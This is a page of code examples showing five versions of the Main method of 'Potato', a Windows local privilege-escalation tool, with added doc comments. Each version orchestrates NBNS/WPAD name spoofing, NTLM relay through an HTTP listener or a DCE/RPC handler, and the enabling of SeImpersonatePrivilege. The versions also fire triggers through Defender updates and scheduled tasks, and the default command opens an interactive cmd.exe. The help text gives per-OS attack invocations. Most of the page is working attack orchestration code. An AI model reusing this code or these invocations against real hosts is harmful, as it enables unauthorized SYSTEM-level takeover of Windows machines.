Beispiel #1
        //
        /// <summary>
        /// Entry point: reads the options returned by <c>parseArgs</c>, starts the selected
        /// components on worker threads, waits for the HTTP and/or DCE/RPC handler to signal
        /// <c>finished</c>, then aborts the workers and exits the process.
        /// </summary>
        /// <remarks>
        /// Behaviour visible in this method that matters when triaging a host where the binary ran:
        /// with no arguments the token and DCE/RPC modes are switched on implicitly; any
        /// <c>enable_token</c> value (the check is non-null, not "true") leads to
        /// <c>InvokePrivs.EnablePriv("SeImpersonatePrivilege")</c>; the DCE/RPC handler is started
        /// with the fixed arguments "127.0.0.1", "6666", "127.0.0.1", "135" (presumably a loopback
        /// listener and the local RPC endpoint mapper; confirm in DCERPCNtlmHandler); the HTTP
        /// handler uses <c>srv_port</c> (default 80); and the default <c>cmd</c> handed to both
        /// handlers is an interactive cmd.exe.
        /// </remarks>
        /// <param name="args">Raw command line; a help switch in the first position prints usage and exits.</param>
        /// <returns>0; on the normal path the process leaves through Environment.Exit(0) first.</returns>
        static int Main(string[] args)
        {
            Dictionary<string, string> options = parseArgs(args);
            String value;

            // String options: the fallback on the right applies when the option is absent.
            String ip           = options.TryGetValue("ip", out value) ? value : null;
            String cmd          = options.TryGetValue("cmd", out value) ? value : "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String enableEtw    = options.TryGetValue("enable_etw", out value) ? value : null;
            String enableToken  = options.TryGetValue("enable_token", out value) ? value : null;
            String spoofHost    = options.TryGetValue("spoof_host", out value) ? value : "WPAD";
            String spoofAddress = options.TryGetValue("spoof_address", out value) ? value : "127.0.0.1";
            String excludeList  = options.TryGetValue("wpad_exclude", out value) ? value : "live.sysinternals.com";

            // Switches: only the exact literal "true" turns a component on.
            bool exhaust      = options.TryGetValue("enable_exhaust", out value) && value == "true";
            bool httpOn       = options.TryGetValue("enable_httpserver", out value) && value == "true";
            bool defenderOn   = options.TryGetValue("enable_defender", out value) && value == "true";
            bool defenderScan = options.TryGetValue("enable_defender_scan", out value) && value == "true";
            bool spoofOn      = options.TryGetValue("enable_spoof", out value) && value == "true";
            bool scheduleOn   = options.TryGetValue("schedule_task", out value) && value == "true";
            bool dceOn        = options.TryGetValue("enable_dce", out value) && value == "true";
            bool dropFirst    = options.TryGetValue("drop_first_dcom", out value) && value == "true";

            // A non-numeric srv_port makes Int32.Parse throw before anything is started.
            int srvPort = options.TryGetValue("srv_port", out value) ? Int32.Parse(value) : 80;

            if (args.Length == 0)
            {
                // Bare invocation: token and DCE/RPC modes are switched on implicitly.
                enableToken = "true";
                dceOn       = true;
            }
            else
            {
                switch (args[0].ToLower())
                {
                    case "-h":
                    case "--h":
                    case "-help":
                    case "--help":
                    case "/?":
                        PrintHelp();
                        string[] usageExamples =
                        {
                            "\nExample Windows 7:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true",
                            "\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -schedule_task true",
                            "\nExample Windows Server 2008:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_spoof true -spoof_host \"WPAD.DOMAIN.TLD\" ",
                            "\nExample Windows Server 2012:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_spoof true",
                            "\nExample Windows 10:\nPotato.exe -ip <ip> -cmd \"ping 127.0.0.1\" -enable_httpserver true -enable_defender_scan true",
                            "\nExample Enable WebClient:\nPotato.exe -enable_etw true\nPotato.exe -enable_etw 22b6d684-fa63-4578-87c9-effcbe6643c7",
                            "\nExample IIS/MSSQL/*:\nPotato.exe -enable_token true -enable_dce true",
                            "Potato.exe -enable_token true -enable_httpserver true -enable_defender_scan true -srv_port 9595",
                            "Potato.exe"
                        };
                        foreach (string line in usageExamples)
                        {
                            Console.WriteLine(line);
                        }
                        Environment.Exit(0);
                        break;
                }
            }

            // Presence alone is enough here: "-enable_token false" still enables the privilege.
            if (enableToken != null)
            {
                InvokePrivs.EnablePriv("SeImpersonatePrivilege");
            }

            // The raw option value is forwarded; the help text shows "true" or a GUID.
            if (enableEtw != null)
            {
                EventTriggers.start_service(enableEtw);
            }

            // HTTP handler: the object is always constructed, the listener thread only on request.
            String[]        wpadExclude = excludeList.Split(',');
            HTTPNtlmHandler httpHandler = new HTTPNtlmHandler();
            Thread          httpThread  = null;

            if (httpOn)
            {
                httpThread = new Thread(() => httpHandler.startListening(cmd, wpadExclude, srvPort, enableToken));
                httpThread.Start();
            }

            // DCE/RPC handler plus the COM bootstrap that follows it after a short pause.
            DCERPCNtlmHandler dcerpcHandler   = new DCERPCNtlmHandler();
            Thread            bootstrapThread = null;
            Thread            dcerpcThread    = null;

            if (dceOn)
            {
                dcerpcThread = new Thread(() => dcerpcHandler.start("127.0.0.1", "6666", "127.0.0.1", "135", cmd, dropFirst, enableToken));
                dcerpcThread.Start();
                Thread.Sleep(100);
                try
                {
                    bootstrapThread = new Thread(() => ComUtils.BootstrapComMarshal());
                    bootstrapThread.Start();
                }
                catch (Exception ex)
                {
                    Console.WriteLine("This wasn't supposed to happen... {0}", ex);
                }
            }

            // Name spoofing: the thread object exists either way because it is aborted at the end.
            Spoofer spoofer     = new NBNSSpoofer();
            Thread  spoofThread = new Thread(() => spoofer.startSpoofing(ip, spoofHost, spoofAddress, exhaust));

            if (spoofOn)
            {
                if (ip == null || spoofAddress == null)
                {
                    Console.WriteLine("Need IP and spoof address for spoofing?");
                    Environment.Exit(0);
                }
                spoofThread.Start();
                if (exhaust)
                {
                    // Poll the static flag every two seconds until the spoofer reports it is done.
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoofer.checkSpoof(spoofHost, spoofAddress);
                Console.WriteLine(String.Concat("Spoofed target ", spoofHost, " succesfully..."));
            }

            // Optional triggers; each runs on its own thread.
            UpdateLauncher updater      = new UpdateLauncher();
            Thread         updateThread = new Thread(() => updater.launchUpdateCheck());

            if (defenderOn)
            {
                updateThread.Start();
            }

            Thread scanThread = new Thread(() => updater.scan_file(srvPort));

            if (defenderScan)
            {
                scanThread.Start();
            }

            ScheduleTask scheduler    = new ScheduleTask();
            Thread       scheduleTask = new Thread(() => scheduler.schtask(srvPort));

            if (scheduleOn)
            {
                scheduleTask.Start();
            }

            // Block until each started handler signals completion, then tear its thread down.
            if (httpThread != null)
            {
                httpHandler.finished.WaitOne();
                httpThread.Abort();
            }

            if (dcerpcThread != null)
            {
                DCERPCNtlmHandler.finished.WaitOne();
                dcerpcThread.Abort();
                bootstrapThread.Abort();
            }

            spoofThread.Abort();
            updateThread.Abort();
            scanThread.Abort();
            Thread.Sleep(500);
            Environment.Exit(0);
            return 0;
        }
Beispiel #2
        /// <summary>
        /// Entry point: requires <c>-ip</c>, starts the HTTP handler unconditionally, runs the
        /// name spoofer and the update-check trigger unless they are disabled, optionally starts
        /// the scheduled-task trigger, then waits for the HTTP handler to signal <c>finished</c>.
        /// </summary>
        /// <remarks>
        /// Opt-out semantics: spoofing and the update check run when their <c>disable_*</c> option
        /// is absent or is the literal "false"; any other value switches them off. The HTTP
        /// handler listens on <c>srv_port</c> (default 80) and receives <c>cmd</c>, which defaults
        /// to an interactive cmd.exe.
        /// </remarks>
        /// <param name="args">Raw command line, parsed by <c>parseArgs</c>.</param>
        /// <returns>Always 0, including when only the usage line is printed.</returns>
        static int Main(string[] args)
        {
            Dictionary<string, string> options = parseArgs(args);
            String value;

            // String options: the fallback on the right applies when the option is absent.
            String ip           = options.TryGetValue("ip", out value) ? value : null;
            String cmd          = options.TryGetValue("cmd", out value) ? value : "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String spoofHost    = options.TryGetValue("spoof_host", out value) ? value : "WPAD";
            String spoofAddress = options.TryGetValue("spoof_address", out value) ? value : "127.0.0.1";
            String excludeList  = options.TryGetValue("wpad_exclude", out value) ? value : "live.sysinternals.com";

            bool disableExhaust = options.TryGetValue("disable_exhaust", out value) && value == "true";
            bool scheduleOn     = options.TryGetValue("schedule_task", out value) && value == "true";

            // Opt-out switches: absent or "false" keeps the component running.
            bool spoofOn    = !options.TryGetValue("disable_spoof", out value) || value == null || value == "false";
            bool defenderOn = !options.TryGetValue("disable_defender", out value) || value == null || value == "false";

            // A non-numeric srv_port makes Int32.Parse throw before the usage check below.
            int srvPort = options.TryGetValue("srv_port", out value) ? Int32.Parse(value) : 80;

            if (ip == null)
            {
                Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -spoof_address <default, localip> -wpad_exclude <comma separated host to exclude, optional> -schedule_task <true/false, Win10 only, optional> -srv_port <port for webserver to listen, default 80>");
                return 0;
            }

            Spoofer         spoofer     = new NBNSSpoofer();
            HTTPNtlmHandler httpHandler = new HTTPNtlmHandler();
            String[]        wpadExclude = excludeList.Split(',');

            // The HTTP handler has no switch in this version; it always starts.
            Thread httpThread = new Thread(() => httpHandler.startListening(cmd, wpadExclude, srvPort));
            httpThread.Start();

            // disableExhaust is forwarded as-is; how startSpoofing interprets it is not visible here.
            Thread spoofThread = new Thread(() => spoofer.startSpoofing(ip, spoofHost, spoofAddress, disableExhaust));

            if (spoofOn)
            {
                spoofThread.Start();
                if (!disableExhaust)
                {
                    // Poll the static flag every two seconds until the spoofer reports it is done.
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoofer.checkSpoof(spoofHost, spoofAddress);
                Console.WriteLine(String.Concat("Spoofed target ", spoofHost, " succesfully..."));
            }

            UpdateLauncher updater      = new UpdateLauncher();
            Thread         updateThread = new Thread(() => updater.launchUpdateCheck());

            if (defenderOn)
            {
                updateThread.Start();
            }

            ScheduleTask scheduler    = new ScheduleTask();
            Thread       scheduleTask = new Thread(() => scheduler.schtask(srvPort));

            if (scheduleOn)
            {
                // NOTE(review): the thread was created from a parameterless lambda; Thread.Start(object)
                // throws InvalidOperationException for such a thread, so this branch faults as written.
                scheduleTask.Start(srvPort);
            }

            // Block until the HTTP handler signals completion, then tear the workers down.
            httpHandler.finished.WaitOne();
            spoofThread.Abort();
            updateThread.Abort();
            httpThread.Abort();
            return 0;
        }
Beispiel #3
        /// <summary>
        /// Entry point: requires <c>-ip</c>, starts the HTTP handler unconditionally, runs the
        /// name spoofer and the update-check trigger unless they are disabled, then waits for the
        /// HTTP handler to signal <c>finished</c>.
        /// </summary>
        /// <remarks>
        /// Opt-out semantics: spoofing and the update check run when their <c>disable_*</c> option
        /// is absent or is the literal "false"; any other value switches them off. No listening
        /// port is passed to the HTTP handler in this version, and <c>cmd</c> defaults to an
        /// interactive cmd.exe.
        /// </remarks>
        /// <param name="args">Raw command line, parsed by <c>parseArgs</c>.</param>
        /// <returns>Always 0, including when only the usage line is printed.</returns>
        static int Main(string[] args)
        {
            Dictionary<string, string> options = parseArgs(args);
            String value;

            // String options: the fallback on the right applies when the option is absent.
            String ip          = options.TryGetValue("ip", out value) ? value : null;
            String cmd         = options.TryGetValue("cmd", out value) ? value : "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String spoofHost   = options.TryGetValue("spoof_host", out value) ? value : "WPAD";
            String excludeList = options.TryGetValue("wpad_exclude", out value) ? value : "potatopotato.com";

            bool disableExhaust = options.TryGetValue("disable_exhaust", out value) && value == "true";

            // Opt-out switches: absent or "false" keeps the component running.
            bool spoofOn    = !options.TryGetValue("disable_spoof", out value) || value == null || value == "false";
            bool defenderOn = !options.TryGetValue("disable_defender", out value) || value == null || value == "false";

            if (ip == null)
            {
                Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -wpad_exclude <comma separated host to exclude, optional>");
                return 0;
            }

            Spoofer         spoofer     = new NBNSSpoofer();
            HTTPNtlmHandler httpHandler = new HTTPNtlmHandler();
            String[]        wpadExclude = excludeList.Split(',');

            // The HTTP handler has no switch in this version; it always starts.
            Thread httpThread = new Thread(() => httpHandler.startListening(cmd, wpadExclude));
            httpThread.Start();

            // disableExhaust is forwarded as-is; how startSpoofing interprets it is not visible here.
            Thread spoofThread = new Thread(() => spoofer.startSpoofing(ip, spoofHost, disableExhaust));

            if (spoofOn)
            {
                spoofThread.Start();
                if (!disableExhaust)
                {
                    // Poll the static flag every two seconds until the spoofer reports it is done.
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                spoofer.checkSpoof(spoofHost);
                Console.WriteLine(String.Concat("Spoofed target ", spoofHost, " succesfully..."));
            }

            UpdateLauncher updater      = new UpdateLauncher();
            Thread         updateThread = new Thread(() => updater.launchUpdateCheck());

            if (defenderOn)
            {
                updateThread.Start();
            }

            // Block until the HTTP handler signals completion, then tear the workers down.
            httpHandler.finished.WaitOne();
            spoofThread.Abort();
            updateThread.Abort();
            httpThread.Abort();
            return 0;
        }
Beispiel #4
        /// <summary>
        /// Entry point: requires <c>-ip</c>, always starts the HTTP handler, starts the name
        /// spoofer and the update-check trigger unless opted out, and returns once the HTTP
        /// handler has signalled <c>finished</c> and the worker threads have been aborted.
        /// </summary>
        /// <remarks>
        /// A <c>disable_*</c> option that is missing or equal to "false" leaves its component
        /// enabled; every other value disables it. The command handed to the HTTP handler
        /// defaults to an interactive cmd.exe, and the default WPAD exclusion is
        /// "potatopotato.com".
        /// </remarks>
        /// <param name="args">Raw command line, parsed by <c>parseArgs</c>.</param>
        /// <returns>Always 0, including when only the usage line is printed.</returns>
        static int Main(string[] args)
        {
            Dictionary<string, string> parsed = parseArgs(args);
            String raw;

            // Each lookup falls back to its default when the option was not supplied.
            String cmd = parsed.TryGetValue("cmd", out raw) ? raw : "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String ip = parsed.TryGetValue("ip", out raw) ? raw : null;
            String spoofHost = parsed.TryGetValue("spoof_host", out raw) ? raw : "WPAD";
            String wpadExcludeCsv = parsed.TryGetValue("wpad_exclude", out raw) ? raw : "potatopotato.com";

            bool disableExhaust = parsed.TryGetValue("disable_exhaust", out raw) && raw == "true";

            // Components are on unless the matching option holds something other than "false".
            bool runSpoofer = !parsed.TryGetValue("disable_spoof", out raw) || raw == null || raw == "false";
            bool runUpdateCheck = !parsed.TryGetValue("disable_defender", out raw) || raw == null || raw == "false";

            if (ip == null)
            {
                Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -wpad_exclude <comma separated host to exclude, optional>");
                return 0;
            }

            Spoofer nameSpoofer = new NBNSSpoofer();
            HTTPNtlmHandler ntlmHttp = new HTTPNtlmHandler();
            String[] excludedHosts = wpadExcludeCsv.Split(',');

            // No option gates the HTTP handler here.
            Thread ntlmHttpThread = new Thread(() => ntlmHttp.startListening(cmd, excludedHosts));
            ntlmHttpThread.Start();

            // The flag is passed through unchanged; its meaning inside startSpoofing is not shown here.
            Thread nameSpooferThread = new Thread(() => nameSpoofer.startSpoofing(ip, spoofHost, disableExhaust));

            if (runSpoofer)
            {
                nameSpooferThread.Start();
                if (!disableExhaust)
                {
                    // Wait, in two-second steps, for the spoofer's static completion flag.
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                nameSpoofer.checkSpoof(spoofHost);
                Console.WriteLine(String.Concat("Spoofed target ", spoofHost, " succesfully..."));
            }

            UpdateLauncher launcher = new UpdateLauncher();
            Thread launcherThread = new Thread(() => launcher.launchUpdateCheck());

            if (runUpdateCheck)
            {
                launcherThread.Start();
            }

            // The HTTP handler's completion signal ends the run for every worker.
            ntlmHttp.finished.WaitOne();
            nameSpooferThread.Abort();
            launcherThread.Abort();
            ntlmHttpThread.Abort();
            return 0;
        }
Beispiel #5
        /// <summary>
        /// Entry point: requires <c>-ip</c>, always starts the HTTP handler on <c>srv_port</c>,
        /// starts the name spoofer and the update-check trigger unless opted out, optionally
        /// starts the scheduled-task trigger, and returns once the HTTP handler has signalled
        /// <c>finished</c> and the worker threads have been aborted.
        /// </summary>
        /// <remarks>
        /// A <c>disable_*</c> option that is missing or equal to "false" leaves its component
        /// enabled; every other value disables it. Defaults visible here: port 80, spoof host
        /// "WPAD", spoof address "127.0.0.1", and an interactive cmd.exe as <c>cmd</c>.
        /// </remarks>
        /// <param name="args">Raw command line, parsed by <c>parseArgs</c>.</param>
        /// <returns>Always 0, including when only the usage line is printed.</returns>
        static int Main(string[] args)
        {
            Dictionary<string, string> parsed = parseArgs(args);
            String raw;

            // Each lookup falls back to its default when the option was not supplied.
            String cmd = parsed.TryGetValue("cmd", out raw) ? raw : "\"C:\\Windows\\System32\\cmd.exe\" /K start";
            String ip = parsed.TryGetValue("ip", out raw) ? raw : null;
            String spoofHost = parsed.TryGetValue("spoof_host", out raw) ? raw : "WPAD";
            String spoofAddress = parsed.TryGetValue("spoof_address", out raw) ? raw : "127.0.0.1";
            String wpadExcludeCsv = parsed.TryGetValue("wpad_exclude", out raw) ? raw : "live.sysinternals.com";

            bool disableExhaust = parsed.TryGetValue("disable_exhaust", out raw) && raw == "true";
            bool runScheduledTask = parsed.TryGetValue("schedule_task", out raw) && raw == "true";

            // Components are on unless the matching option holds something other than "false".
            bool runSpoofer = !parsed.TryGetValue("disable_spoof", out raw) || raw == null || raw == "false";
            bool runUpdateCheck = !parsed.TryGetValue("disable_defender", out raw) || raw == null || raw == "false";

            // Int32.Parse throws on a non-numeric port, before the usage check is reached.
            int srvPort = parsed.TryGetValue("srv_port", out raw) ? Int32.Parse(raw) : 80;

            if (ip == null)
            {
                Console.WriteLine("Usage: potato.exe -ip <ip address, required> -cmd <command, optional> -disable_exhaust <true/false, optional> -disable_defender <true/false, optional> -disable_spoof <true/false, optional> -spoof_host <default wpad, optional> -spoof_address <default, localip> -wpad_exclude <comma separated host to exclude, optional> -schedule_task <true/false, Win10 only, optional> -srv_port <port for webserver to listen, default 80>");
                return 0;
            }

            Spoofer nameSpoofer = new NBNSSpoofer();
            HTTPNtlmHandler ntlmHttp = new HTTPNtlmHandler();
            String[] excludedHosts = wpadExcludeCsv.Split(',');

            // No option gates the HTTP handler here.
            Thread ntlmHttpThread = new Thread(() => ntlmHttp.startListening(cmd, excludedHosts, srvPort));
            ntlmHttpThread.Start();

            // The flag is passed through unchanged; its meaning inside startSpoofing is not shown here.
            Thread nameSpooferThread = new Thread(() => nameSpoofer.startSpoofing(ip, spoofHost, spoofAddress, disableExhaust));

            if (runSpoofer)
            {
                nameSpooferThread.Start();
                if (!disableExhaust)
                {
                    // Wait, in two-second steps, for the spoofer's static completion flag.
                    while (NBNSSpoofer.doneUdp == false)
                    {
                        Thread.Sleep(2000);
                    }
                }
                nameSpoofer.checkSpoof(spoofHost, spoofAddress);
                Console.WriteLine(String.Concat("Spoofed target ", spoofHost, " succesfully..."));
            }

            UpdateLauncher launcher = new UpdateLauncher();
            Thread launcherThread = new Thread(() => launcher.launchUpdateCheck());

            if (runUpdateCheck)
            {
                launcherThread.Start();
            }

            ScheduleTask taskTrigger = new ScheduleTask();
            Thread taskTriggerThread = new Thread(() => taskTrigger.schtask(srvPort));

            if (runScheduledTask)
            {
                // NOTE(review): the thread was created from a parameterless lambda; Thread.Start(object)
                // throws InvalidOperationException for such a thread, so this branch faults as written.
                taskTriggerThread.Start(srvPort);
            }

            // The HTTP handler's completion signal ends the run for every worker.
            ntlmHttp.finished.WaitOne();
            nameSpooferThread.Abort();
            launcherThread.Abort();
            ntlmHttpThread.Abort();
            return 0;
        }